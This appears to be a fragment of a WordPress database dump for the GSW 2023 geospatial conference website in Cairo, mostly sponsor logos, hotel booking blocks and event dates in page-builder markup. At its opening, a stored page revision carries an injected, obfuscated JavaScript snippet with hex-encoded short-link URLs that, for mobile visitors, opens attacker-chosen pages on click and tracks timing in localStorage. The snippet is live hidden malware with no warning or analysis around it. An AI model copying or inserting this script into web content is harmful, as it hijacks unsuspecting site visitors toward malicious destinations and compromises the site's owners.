_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-07-10 00:32:51','2023-07-10 00:32:51','',4849,'https://gsw2023.com/?p=4979',0,'revision','',0),
(4980,1,'2023-07-10 00:34:55','2023-07-10 00:34:55','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: 